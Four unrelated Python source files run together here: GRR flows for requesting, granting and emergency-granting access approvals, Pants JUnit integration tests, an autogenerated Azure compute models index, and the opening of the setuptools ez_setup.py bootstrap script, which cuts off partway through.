<html><body><h1>Access to %(subject_title)s granted.</h1>
The user %(username)s has granted access to %(subject_title)s for the
purpose of "%(reason)s".
Please click <a href='%(admin_ui)s#%(subject_urn)s'>here</a> to access it.
<p>Thanks,</p>
<p>%(signature)s</p>
</body></html>"""
body = template % dict(
subject_title=subject_title,
username=self.token.username,
reason=self.args.reason,
admin_ui=config_lib.CONFIG["AdminUI.url"],
subject_urn=access_urn,
signature=config_lib.CONFIG["Email.signature"]
)
# Email subject should match approval request, and we add message id
# references so they are grouped together in a thread by gmail.
subject = u"Approval for %s to access %s." % (
utils.SmartStr(self.args.delegate), subject_title)
headers = {"In-Reply-To": email_msg_id, "References": email_msg_id}
email_alerts.SendEmail(utils.SmartStr(self.args.delegate),
utils.SmartStr(self.token.username), subject,
utils.SmartStr(body), is_html=True,
cc_addresses=config_lib.CONFIG[
"Email.approval_cc_address"],
headers=headers)
class BreakGlassGrantApprovalWithReasonFlow(GrantApprovalWithReasonFlow):
"""Grant an approval in an emergency."""
@flow.StateHandler()
def Start(self):
"""Create the Approval object and notify the Approval Granter."""
approval_urn = self.BuildApprovalUrn()
subject_title = self.BuildSubjectTitle()
# Create a new Approval object.
approval_request = aff4.FACTORY.Create(approval_urn,
aff4_type=self.approval_type,
token=self.token)
approval_request.Set(approval_request.Schema.REASON(self.args.reason))
approval_request.AddAttribute(
approval_request.Schema.APPROVER(self.token.username))
# This is a break glass approval.
break_glass = approval_request.Schema.BREAK_GLASS().Now()
# By default a break_glass approval only lasts 24 hours.
break_glass += 60 * 60 * 24 * 1e6
approval_request.Set(break_glass)
approval_request.Close(sync=True)
# Notify the user.
fd = aff4.FACTORY.Create(aff4.ROOT_URN.Add("users").Add(
self.token.username), "GRRUser", mode="rw", token=self.token)
fd.Notify("ViewObject", self.args.subject_urn,
"An Emergency Approval has been granted to access "
"%s." % subject_title, self.session_id)
fd.Close()
template = u"""
<html><body><h1>Emergency Access Granted.</h1>
The user %(username)s has requested emergency access to %(subject_title)s.
for the purpose of: "%(reason)s".
This access has been logged and granted for 24 hours.
<p>Thanks,</p>
<p>%(signature)s</p>
</body></html>"""
body = template % dict(
client_id=self.client_id,
username=self.token.username,
subject_title=subject_title,
reason=self.args.reason,
signature=config_lib.CONFIG["Email.signature"]),
email_alerts.SendEmail(
config_lib.CONFIG["Monitoring.emergency_access_email"],
self.token.username,
u"Emergency approval granted for %s." % subject_title,
utils.SmartStr(body), is_html=True,
cc_addresses=config_lib.CONFIG["Email.approval_cc_address"])
class RequestClientApprovalFlow(RequestApprovalWithReasonFlow):
"""A flow to request approval to access a client."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "ClientApproval"
def BuildApprovalUrn(self):
"""Builds approval object urn."""
event = rdfvalue.AuditEvent(user=self.token.username,
action="CLIENT_APPROVAL_REQUEST",
client=self.client_id,
description=self.args.reason)
flow.Events.PublishEvent("Audit", event, token=self.token)
return self.ApprovalUrnBuilder(self.client_id.Path(), self.token.username,
self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
client = aff4.FACTORY.Open(self.client_id, token=self.token)
hostname = client.Get(client.Schema.HOSTNAME)
return u"GRR client %s (%s)" % (self.client_id.Basename(), hostname)
class GrantClientApprovalFlow(GrantApprovalWithReasonFlow):
"""Grant the approval requested."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "ClientApproval"
def BuildApprovalUrn(self):
"""Builds approval object urn."""
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="CLIENT_APPROVAL_GRANT",
client=self.client_id,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.client_id.Path(), self.args.delegate,
self.args.reason)
def BuildAccessUrl(self):
"""Builds the urn to access this object."""
return urllib.urlencode((("c", self.client_id),
("main", "HostInformation")))
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
client = aff4.FACTORY.Open(self.client_id, token=self.token)
hostname = client.Get(client.Schema.HOSTNAME)
return u"GRR client %s (%s)" % (self.client_id.Basename(), hostname)
class BreakGlassGrantClientApprovalFlow(BreakGlassGrantApprovalWithReasonFlow):
"""Grant an approval in an emergency."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "ClientApproval"
def BuildApprovalUrn(self):
"""Builds approval object urn."""
event = rdfvalue.AuditEvent(user=self.token.username,
action="CLIENT_APPROVAL_BREAK_GLASS_REQUEST",
client=self.client_id,
description=self.args.reason)
flow.Events.PublishEvent("Audit", event, token=self.token)
return self.ApprovalUrnBuilder(self.client_id.Path(), self.token.username,
self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
client = aff4.FACTORY.Open(self.client_id, token=self.token)
hostname = client.Get(client.Schema.HOSTNAME)
return u"GRR client %s (%s)" % (self.client_id.Basename(), hostname)
class RequestHuntApprovalFlow(RequestApprovalWithReasonFlow):
"""A flow to request approval to access a client."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "HuntApproval"
def BuildApprovalUrn(self):
"""Builds approval object URN."""
# In this case subject_urn is hunt's URN.
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="HUNT_APPROVAL_REQUEST",
urn=self.args.subject_urn,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.args.subject_urn.Path(),
self.token.username, self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
return u"hunt %s" % self.args.subject_urn.Basename()
class GrantHuntApprovalFlow(GrantApprovalWithReasonFlow):
"""Grant the approval requested."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "HuntApproval"
def BuildApprovalUrn(self):
"""Builds approval object URN."""
# In this case subject_urn is hunt's URN.
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="HUNT_APPROVAL_GRANT",
urn=self.args.subject_urn,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.args.subject_urn.Path(),
self.args.delegate, self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
return u"hunt %s" % self.args.subject_urn.Basename()
def BuildAccessUrl(self):
"""Builds the urn to access this object."""
return urllib.urlencode((("main", "ManageHunts"),
("hunt", self.args.subject_urn)))
class RequestCronJobApprovalFlow(RequestApprovalWithReasonFlow):
"""A flow to request approval to manage a cron job."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "CronJobApproval"
def BuildApprovalUrn(self):
"""Builds approval object URN."""
# In this case subject_urn is hunt's URN.
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="CRON_APPROVAL_REQUEST",
urn=self.args.subject_urn,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.args.subject_urn.Path(),
self.token.username, self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
return u"a cron job"
class GrantCronJobApprovalFlow(GrantApprovalWithReasonFlow):
"""Grant approval to manage a cron job."""
# This flow can run on any client without ACL enforcement (an SUID flow).
ACL_ENFORCED = False
approval_type = "CronJobApproval"
def BuildApprovalUrn(self):
"""Builds approval object URN."""
# In this case subject_urn is hunt's URN.
flow.Events.PublishEvent("Audit",
rdfvalue.AuditEvent(user=self.token.username,
action="CRON_APPROVAL_GRANT",
urn=self.args.subject_urn,
description=self.args.reason),
token=self.token)
return self.ApprovalUrnBuilder(self.args.subject_urn.Path(),
self.args.delegate, self.args.reason)
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
return u"a cron job"
def BuildAccessUrl(self):
"""Builds the urn to access this object."""
return urllib.urlencode({"main": "ManageCron"})
|
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import os
from pants.base.build_environment import get_buildroot
from pants_test.pants_run_integration_test import PantsRunIntegrationTest
class JunitTestsIntegrationTest(PantsRunIntegrationTest):
def _assert_output_for_class(self, workdir, classname):
def get_outdir(basedir):
return os.path.join(basedir, 'test', 'junit')
def get_stdout_file(basedir):
return os.path.join(basedir, '{}.out.txt'.format(classname))
def get_stderr_file(basedir):
return os.path.join(basedir, '{}.err.txt'.format(classname))
outdir = get_outdir(os.path.join(get_buildroot(), 'dist'))
self.assertTrue(os.path.exists(get_stdout_file(outdir)))
self.assertTrue(os.path.exists(get_stderr_file(outdir)))
legacy_outdir = get_outdir(workdir)
self.assertFalse(os.path.exists(get_stdout_file(legacy_outdir)))
self.assertFalse(os.path.exists(get_stderr_file(legacy_outdir)))
def test_junit_test_custom_interpreter(self):
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
['test.junit',
'examples/tests/java/org/pantsbuild/example/hello/greet',
'examples/tests/scala/org/pantsbuild/example/hello/welcome'],
workdir)
self.assert_success(pants_run)
self._assert_output_for_class(workdir=workdir,
classname='org.pantsbuild.example.hello.greet.GreetingTest')
self._assert_output_for_class(workdir=workdir,
classname='org.pantsbuild.example.hello.welcome.WelSpec')
def test_junit_test(self):
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir([
'test',
'testprojects/tests/scala/org/pantsbuild/testproject/empty'],
workdir)
self.assert_failure(pants_run)
def test_junit_test_with_test_option_with_classname(self):
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
['test.junit',
'--test=org.pantsbuild.example.hello.greet.GreetingTest',
'examples/tests/java/org/pantsbuild/example/hello/greet',
'examples/tests/scala/org/pantsbuild/example/hello/welcome'],
workdir)
self.assert_success(pants_run)
self._assert_output_for_class(workdir=workdir,
classname='org.pantsbuild.example.hello.greet.GreetingTest')
def test_junit_test_requiring_cwd_fails_without_option_specified(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/cwdexample',
'--python-setup-interpreter-constraints=CPython>=2.7,<3',
'--python-setup-interpreter-constraints=CPython>=3.3',
'--jvm-test-junit-options=-Dcwd.test.enabled=true'])
self.assert_failure(pants_run)
def test_junit_test_requiring_cwd_passes_with_option_with_value_specified(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/cwdexample',
'--python-setup-interpreter-constraints=CPython>=2.7,<3',
'--python-setup-interpreter-constraints=CPython>=3.3',
'--jvm-test-junit-options=-Dcwd.test.enabled=true',
'--no-test-junit-chroot',
'--test-junit-cwd=testprojects/src/java/org/pantsbuild/testproject/cwdexample/subdir'])
self.assert_success(pants_run)
def test_junit_test_requiring_cwd_fails_with_option_with_no_value_specified(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/cwdexample',
'--python-setup-interpreter-constraints=CPython>=2.7,<3',
'--python-setup-interpreter-constraints=CPython>=3.3',
'--jvm-test-junit-options=-Dcwd.test.enabled=true'])
self.assert_failure(pants_run)
def test_junit_test_early_exit(self):
pants_run = self.run_pants([
'test',
'testprojects/src/java/org/pantsbuild/testproject/junit/earlyexit:tests'])
self.assert_failure(pants_run)
self.assertIn('java.lang.UnknownError: Abnormal VM exit - test crashed.', pants_run.stdout_data)
self.assertIn('Tests run: 0, Failures: 1', pants_run.stdout_data)
self.assertIn('FATAL: VM exiting unexpectedly.', pants_run.stdout_data)
def test_junit_test_target_cwd(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/workdirs/onedir'])
self.assert_success(pants_run)
def test_junit_test_annotation_processor(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/annotation'])
self.assert_success(pants_run)
def test_junit_test_256_failures(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/fail256'])
self.assert_failure(pants_run)
self.assertIn('Failures: 256', pants_run.stdout_data)
def test_junit_test_duplicate_resources(self):
pants_run = self.run_pants([
'test',
'testprojects/maven_layout/junit_resource_collision'])
self.assert_success(pants_run)
def test_junit_test_target_cwd_overrides_option(self):
pants_run = self.run_pants([
'test',
'testprojects/tests/java/org/pantsbuild/testproject/workdirs/onedir',
'--no-test-junit-chroot',
'--test-junit-cwd=testprojects/tests/java/org/pantsbuild/testproject/dummies'])
self.assert_success(pants_run)
def test_junit_test_failure_summary(self):
with self.temporary_workdir() as workdir:
failing_tree = 'testprojects/src/java/org/pantsbuild/testproject/junit/failing'
with self.source_clone(failing_tree) as failing:
failing_addr = os.path.join(failing, 'tests', 'org', 'pantsbuild', 'tmp', 'tests')
pants_run = self.run_pants_with_workdir(['test.junit', '--failure-summary', failing_addr],
workdir)
self.assert_failure(pants_run)
expected_groups = []
expected_groups.append([
'org/pantsbuild/tmp/tests:one',
'org.pantsbuild.tmp.tests.OneTest#testSingle'
])
expected_groups.append([
'org/pantsbuild/tmp/tests:two',
'org.pantsbuild.tmp.tests.TwoTest#testTupleFirst',
'org.pantsbuild.tmp.tests.TwoTest#testTupleSecond',
])
expected_groups.append([
'org/pantsbuild/tmp/tests:three',
'org.pantsbuild.tmp.tests.subtest.ThreeTest#testTripleFirst',
'org.pantsbuild.tmp.tests.subtest.ThreeTest#testTripleSecond',
'org.pantsbuild.tmp.tests.subtest.ThreeTest#testTripleThird',
])
output = '\n'.join(line.strip() for line in pants_run.stdout_data.split('\n'))
for group in expected_groups:
self.assertIn('\n'.join(group), output)
def test_junit_test_no_failure_summary(self):
with self.temporary_workdir() as workdir:
failing_tree = 'testprojects/src/java/org/pantsbuild/testproject/junit/failing'
with self.source_clone(failing_tree) as failing:
failing_addr = os.path.join(failing, 'tests', 'org', 'pantsbuild', 'tmp', 'tests')
pants_run = self.run_pants_with_workdir(['test.junit',
'--no-failure-summary',
failing_addr],
workdir)
self.assert_failure(pants_run)
output = '\n'.join(line.strip() for line in pants_run.stdout_data.split('\n'))
self.assertNotIn('org/pantsbuild/tmp/tests:three\n'
'org.pantsbuild.tmp.tests.subtest.ThreeTest#testTripleFirst',
output)
def test_junit_test_successes_and_failures(self):
with self.temporary_workdir() as workdir:
mixed_tree = 'testprojects/src/java/org/pantsbuild/testproject/junit/mixed'
with self.source_clone(mixed_tree) as mixed:
mixed_addr = os.path.join(mixed, 'tests', 'org', 'pantsbuild', 'tmp', 'tests')
pants_run = self.run_pants_with_workdir(['test.junit',
'--failure-summary',
'--no-fail-fast',
mixed_addr],
workdir)
group = [
'org/pantsbuild/tmp/tests',
'org.pantsbuild.tmp.tests.AllTests#test1Failure',
'org.pantsbuild.tmp.tests.AllTests#test3Failure',
'org.pantsbuild.tmp.tests.AllTests#test4Error',
'org.pantsbuild.tmp.tests.InnerClassTests$InnerClassFailureTest#testInnerFailure',
'org.pantsbuild.tmp.tests.InnerClassTests$InnerInnerTest$InnerFailureTest#testFailure']
output = '\n'.join(line.strip() for line in pants_run.stdout_data.split('\n'))
self.assertIn('\n'.join(group), output,
'{group}\n not found in\n\n{output}.'.format(group='\n'.join(group),
output=output))
self.assertNotIn('org.pantsbuild.tmp.tests.AllTests#test2Success', output)
self.assertNotIn('org.pantsbuild.tmp.tests.AllTestsBase', output)
self.assertNotIn('org.pantsbuild.tmp.tests.AllTests$InnerClassSuccessTest', output)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .instance_view_status import InstanceViewStatus
from .sub_resource import SubResource
from .sku import Sku
from .availability_set import AvailabilitySet
from .virtual_machine_size import VirtualMachineSize
from .virtual_machine_extension_image import VirtualMachineExtensionImage
from .virtual_machine_image_resource import VirtualMachineImageResource
from .virtual_machine_extension_instance_view import VirtualMachineExtensionInstanceView
from .virtual_machine_extension import VirtualMachineExtension
from .purchase_plan import PurchasePlan
from .os_disk_image import OSDiskImage
from .data_disk_image import DataDiskImage
from .virtual_machine_image import VirtualMachineImage
from .usage_name import UsageName
from .usage import Usage
from .virtual_machine_capture_parameters import VirtualMachineCaptureParameters
from .virtual_machine_capture_result import VirtualMachineCaptureResult
from .plan import Plan
from .hardware_profile import HardwareProfile
from .image_reference import ImageReference
from .key_vault_secret_reference import KeyVaultSecretReference
from .key_vault_key_reference import KeyVaultKeyReference
from .disk_encryption_settings import DiskEncryptionSettings
from .virtual_hard_disk import VirtualHardDisk
from .managed_disk_parameters import ManagedDiskParameters
from .os_disk import OSDisk
from .data_disk import DataDisk
from .storage_profile import StorageProfile
from .additional_unattend_content import AdditionalUnattendContent
from .win_rm_listener import WinRMListener
from .win_rm_configuration import WinRMConfiguration
from .windows_configuration import WindowsConfiguration
from .ssh_public_key import SshPublicKey
from .ssh_configuration import SshConfiguration
from .linux_configuration import LinuxConfiguration
from .vault_certificate import VaultCertificate
from .vault_secret_group import VaultSecretGroup
from .os_profile import OSProfile
from .network_interface_reference import NetworkInterfaceReference
from .network_profile import NetworkProfile
from .boot_diagnostics import BootDiagnostics
from .diagnostics_profile import DiagnosticsProfile
from .virtual_machine_extension_handler_instance_view import VirtualMachineExtensionHandlerInstanceView
from .virtual_machine_agent_instance_view import VirtualMachineAgentInstanceView
from .disk_instance_view import DiskInstanceView
from .boot_diagnostics_instance_view import BootDiagnosticsInstanceView
from .virtual_machine_instance_view import VirtualMachineInstanceView
from .virtual_machine import VirtualMachine
from .upgrade_policy import UpgradePolicy
from .image_os_disk import ImageOSDisk
from .image_data_disk import ImageDataDisk
from .image_storage_profile import ImageStorageProfile
from .image import Image
from .virtual_machine_scale_set_os_profile import VirtualMachineScaleSetOSProfile
from .virtual_machine_scale_set_managed_disk_parameters import VirtualMachineScaleSetManagedDiskParameters
from .virtual_machine_scale_set_os_disk import VirtualMachineScaleSetOSDisk
from .virtual_machine_scale_set_data_disk import VirtualMachineScaleSetDataDisk
from .virtual_machine_scale_set_storage_profile import VirtualMachineScaleSetStorageProfile
from .api_entity_reference import ApiEntityReference
from .virtual_machine_scale_set_ip_configuration import VirtualMachineScaleSetIPConfiguration
from .virtual_machine_scale_set_network_configuration import VirtualMachineScaleSetNetworkConfiguration
from .virtual_machine_scale_set_network_profile import VirtualMachineScaleSetNetworkProfile
from .virtual_machine_scale_set_extension import VirtualMachineScaleSetExtension
from .virtual_machine_scale_set_extension_profile import VirtualMachineScaleSetExtensionProfile
from .virtual_machine_scale_set_vm_profile import VirtualMachineScaleSetVMProfile
from .virtual_machine_scale_set import VirtualMachineScaleSet
from .virtual_machine_scale_set_vm_instance_ids import VirtualMachineScaleSetVMInstanceIDs
from .virtual_machine_scale_set_vm_instance_required_ids import VirtualMachineScaleSetVMInstanceRequiredIDs
from .virtual_machine_status_code_count import VirtualMachineStatusCodeCount
from .virtual_machine_scale_set_instance_view_statuses_summary import VirtualMachineScaleSetInstanceViewStatusesSummary
from .virtual_machine_scale_set_vm_extensions_summary import VirtualMachineScaleSetVMExtensionsSummary
from .virtual_machine_scale_set_instance_view import VirtualMachineScaleSetInstanceView
from .virtual_machine_scale_set_sku_capacity import VirtualMachineScaleSetSkuCapacity
from .virtual_machine_scale_set_sku import VirtualMachineScaleSetSku
from .virtual_machine_scale_set_vm import VirtualMachineScaleSetVM
from .virtual_machine_scale_set_vm_instance_view import VirtualMachineScaleSetVMInstanceView
from .api_error_base import ApiErrorBase
from .inner_error import InnerError
from .api_error import ApiError
from .compute_long_running_operation_properties import ComputeLongRunningOperationProperties
from .resource import Resource
from .sub_resource_read_only import SubResourceReadOnly
from .operation_status_response import OperationStatusResponse
from .container_service_custom_profile import ContainerServiceCustomProfile
from .container_service_service_principal_profile import ContainerServiceServicePrincipalProfile
from .container_service_orchestrator_profile import ContainerServiceOrchestratorProfile
from .container_service_master_profile import ContainerServiceMasterProfile
from .container_service_agent_pool_profile import ContainerServiceAgentPoolProfile
from .container_service_windows_profile import ContainerServiceWindowsProfile
from .container_service_ssh_public_key import ContainerServiceSshPublicKey
from .container_service_ssh_configuration import ContainerServiceSshConfiguration
from .container_service_linux_profile import ContainerServiceLinuxProfile
from .container_service_vm_diagnostics import ContainerServiceVMDiagnostics
from .container_service_diagnostics_profile import ContainerServiceDiagnosticsProfile
from .container_service import ContainerService
from .resource_update import ResourceUpdate
from .image_disk_reference import ImageDiskReference
from .creation_data import CreationData
from .source_vault import SourceVault
from .key_vault_and_secret_reference import KeyVaultAndSecretReference
from .key_vault_and_key_reference import KeyVaultAndKeyReference
from .encryption_settings import EncryptionSettings
from .disk import Disk
from .disk_update import DiskUpdate
from .grant_access_data import GrantAccessData
from .access_uri import AccessUri
from .snapshot import Snapshot
from .snapshot_update import SnapshotUpdate
from .availability_set_paged import AvailabilitySetPaged
from .virtual_machine_size_paged import VirtualMachineSizePaged
from .usage_paged import UsagePaged
from .image_paged import ImagePaged
from .virtual_machine_paged import VirtualMachinePaged
from .virtual_machine_scale_set_paged import VirtualMachineScaleSetPaged
from .virtual_machine_scale_set_sku_paged import VirtualMachineScaleSetSkuPaged
from .virtual_machine_scale_set_vm_paged import VirtualMachineScaleSetVMPaged
from .container_service_paged import ContainerServicePaged
from .disk_paged import DiskPaged
from .snapshot_paged import SnapshotPaged
from .compute_management_client_enums import (
StatusLevelTypes,
OperatingSystemTypes,
VirtualMachineSizeTypes,
CachingTypes,
DiskCreateOptionTypes,
StorageAccountTypes,
PassNames,
ComponentNames,
SettingNames,
ProtocolTypes,
UpgradeMode,
OperatingSystemStateTypes,
VirtualMachineScaleSetSkuScaleType,
ContainerServiceOchestratorTypes,
ContainerServiceVMSizeTypes,
DiskCreateOption,
AccessLevel,
InstanceViewTypes,
)
__all__ = [
'InstanceViewStatus',
'SubResource',
'Sku',
'AvailabilitySet',
'VirtualMachineSize',
'VirtualMachineExtensionImage',
'VirtualMachineImageResource',
'VirtualMachineExtensionInstanceView',
'VirtualMachineExtension',
'PurchasePlan',
'OSDiskImage',
'DataDiskImage',
'VirtualMachineImage',
'UsageName',
'Usage',
'VirtualMachineCaptureParameters',
'VirtualMachineCaptureResult',
'Plan',
'HardwareProfile',
'ImageReference',
'KeyVaultSecretReference',
'KeyVaultKeyReference',
'DiskEncryptionSettings',
'VirtualHardDisk',
'ManagedDiskParameters',
'OSDisk',
'DataDisk',
'StorageProfile',
'AdditionalUnattendContent',
'WinRMListener',
'WinRMConfiguration',
'WindowsConfiguration',
'SshPublicKey',
'SshConfiguration',
'LinuxConfiguration',
'VaultCertificate',
'VaultSecretGroup',
'OSProfile',
'NetworkInterfaceReference',
'NetworkProfile',
'BootDiagnostics',
'DiagnosticsProfile',
'VirtualMachineExtensionHandlerInstanceView',
'VirtualMachineAgentInstanceView',
'DiskInstanceView',
'BootDiagnosticsInstanceView',
'VirtualMachineInstanceView',
'VirtualMachine',
'UpgradePolicy',
'ImageOSDisk',
'ImageDataDisk',
'ImageStorageProfile',
'Image',
'VirtualMachineScaleSetOSProfile',
'VirtualMachineScaleSetManagedDiskParameters',
'VirtualMachineScaleSetOSDisk',
'VirtualMachineScaleSetDataDisk',
'VirtualMachineScaleSetStorageProfile',
'ApiEntityReference',
'VirtualMachineScaleSetIPConfiguration',
'VirtualMachineScaleSetNetworkConfiguration',
'VirtualMachineScaleSetNetworkProfile',
'VirtualMachineScaleSetExtension',
'VirtualMachineScaleSetExtensionProfile',
'VirtualMachineScaleSetVMProfile',
'VirtualMachineScaleSet',
'VirtualMachineScaleSetVMInstanceIDs',
'VirtualMachineScaleSetVMInstanceRequiredIDs',
'VirtualMachineStatusCodeCount',
'VirtualMachineScaleSetInstanceViewStatusesSummary',
'VirtualMachineScaleSetVMExtensionsSummary',
'VirtualMachineScaleSetInstanceView',
'VirtualMachineScaleSetSkuCapacity',
'VirtualMachineScaleSetSku',
'VirtualMachineScaleSetVM',
'VirtualMachineScaleSetVMInstanceView',
'ApiErrorBase',
'InnerError',
'ApiError',
'ComputeLongRunningOperationProperties',
'Resource',
'SubResourceReadOnly',
'OperationStatusResponse',
'ContainerServiceCustomProfile',
'ContainerServiceServicePrincipalProfile',
'ContainerServiceOrchestratorProfile',
'ContainerServiceMasterProfile',
'ContainerServiceAgentPoolProfile',
'ContainerServiceWindowsProfile',
'ContainerServiceSshPublicKey',
'ContainerServiceSshConfiguration',
'ContainerServiceLinuxProfile',
'ContainerServiceVMDiagnostics',
'ContainerServiceDiagnosticsProfile',
'ContainerService',
'ResourceUpdate',
'ImageDiskReference',
'CreationData',
'SourceVault',
'KeyVaultAndSecretReference',
'KeyVaultAndKeyReference',
'EncryptionSettings',
'Disk',
'DiskUpdate',
'GrantAccessData',
'AccessUri',
'Snapshot',
'SnapshotUpdate',
'AvailabilitySetPaged',
'VirtualMachineSizePaged',
'UsagePaged',
'ImagePaged',
'VirtualMachinePaged',
'VirtualMachineScaleSetPaged',
'VirtualMachineScaleSetSkuPaged',
'VirtualMachineScaleSetVMPaged',
'ContainerServicePaged',
'DiskPaged',
'SnapshotPaged',
'StatusLevelTypes',
'OperatingSystemTypes',
'VirtualMachineSizeTypes',
'CachingTypes',
'DiskCreateOptionTypes',
'StorageAccountTypes',
'PassNames',
'ComponentNames',
'SettingNames',
'ProtocolTypes',
'UpgradeMode',
'OperatingSystemStateTypes',
'VirtualMachineScaleSetSkuScaleType',
'ContainerServiceOchestratorTypes',
'ContainerServiceVMSizeTypes',
'DiskCreateOption',
'AccessLevel',
'InstanceViewTypes',
]
|
|
#!/usr/bin/env python
"""Bootstrap setuptools installation
To use setuptools in your package's setup.py, include this
file in the same directory and add this to the top of your setup.py::
from ez_setup import use_setuptools
use_setuptools()
To require a specific version of setuptools, set a download
mirror, or use an alternate download directory, simply supply
the appropriate options to ``use_setuptools()``.
This file can also be run as a script to install or upgrade setuptools.
"""
import os
import shutil
import sys
import tempfile
import zipfile
import optparse
import subprocess
import platform
import textwrap
import contextlib
from distutils import log
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
DEFAULT_VERSION = "5.7"
DEFAULT_URL = "https://pypi.python.org/packages/source/s/setuptools/"
def _python_cmd(*args):
"""
Return True if the command succeeded.
"""
args = (sys.executable,) + args
return subprocess.call(args) == 0
def _install(archive_filename, install_args=()):
with archive_context(archive_filename):
# installing
log.warn('Installing Setuptools')
if not _python_cmd('setup.py', 'install', *install_args):
log.warn('Something went wrong during the installation.')
log.warn('See the error message above.')
# exitcode will be 2
return 2
def _build_egg(egg, archive_filename, to_dir):
with archive_context(archive_filename):
# building an egg
log.warn('Building a Setuptools egg in %s', to_dir)
_python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
# returning the result
log.warn(egg)
if not os.path.exists(egg):
raise IOError('Could not build the egg.')
class ContextualZipFile(zipfile.ZipFile):
"""
Supplement ZipFile class to support context manager for Python 2.6
"""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""
Construct a ZipFile or ContextualZipFile as appropriate
"""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
@contextlib.contextmanager
def archive_context(filename):
# extracting the archive
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
with ContextualZipFile(filename) as archive:
archive.extractall()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
yield
finally:
os.chdir(old_wd)
shutil.rmtree(tmpdir)
def _do_download(version, download_base, to_dir, download_delay):
egg = os.path.join(to_dir, 'setuptools-%s-py%d.%d.egg'
% (version, sys.version_info[0], sys.version_info[1]))
if not os.path.exists(egg):
archive = download_setuptools(version, download_base,
to_dir, download_delay)
_build_egg(egg, archive, to_dir)
sys.path.insert(0, egg)
# Remove previously-imported pkg_resources if present (see
# https://bitbucket.org/pypa/setuptools/pull-request/7/ for details).
if 'pkg_resources' in sys.modules:
del sys.modules['pkg_resources']
import setuptools
setuptools.bootstrap_install_from = egg
def use_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, download_delay=15):
to_dir = os.path.abspath(to_dir)
rep_modules = 'pkg_resources', 'setuptools'
imported = set(sys.modules).intersection(rep_modules)
try:
import pkg_resources
except ImportError:
return _do_download(version, download_base, to_dir, download_delay)
try:
pkg_resources.require("setuptools>=" + version)
return
except pkg_resources.DistributionNotFound:
return _do_download(version, download_base, to_dir, download_delay)
except pkg_resources.VersionConflict as VC_err:
if imported:
msg = textwrap.dedent("""
The required version of setuptools (>={version}) is not available,
and can't be installed while this script is running. Please
install a more recent version first, using
'easy_install -U setuptools'.
(Currently using {VC_err.args[0]!r})
""").format(VC_err=VC_err, version=version)
sys.stderr.write(msg)
sys.exit(2)
# otherwise, reload ok
del pkg_resources, sys.modules['pkg_resources']
return _do_download(version, download_base, to_dir, download_delay)
def _clean_check(cmd, target):
"""
Run the command to download target. If the command fails, clean up before
re-raising the error.
"""
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
if os.access(target, os.F_OK):
os.unlink(target)
raise
def download_file_powershell(url, target):
"""
Download the file at url to target using Powershell (which will validate
trust). Raise an exception if the command cannot complete.
"""
target = os.path.abspath(target)
ps_cmd = (
"[System.Net.WebRequest]::DefaultWebProxy.Credentials = "
"[System.Net.CredentialCache]::DefaultCredentials; "
"(new-object System.Net.WebClient).DownloadFile(%(url)r, %(target)r)"
% vars()
)
cmd = [
'powershell',
'-Command',
ps_cmd,
]
_clean_check(cmd, target)
def has_powershell():
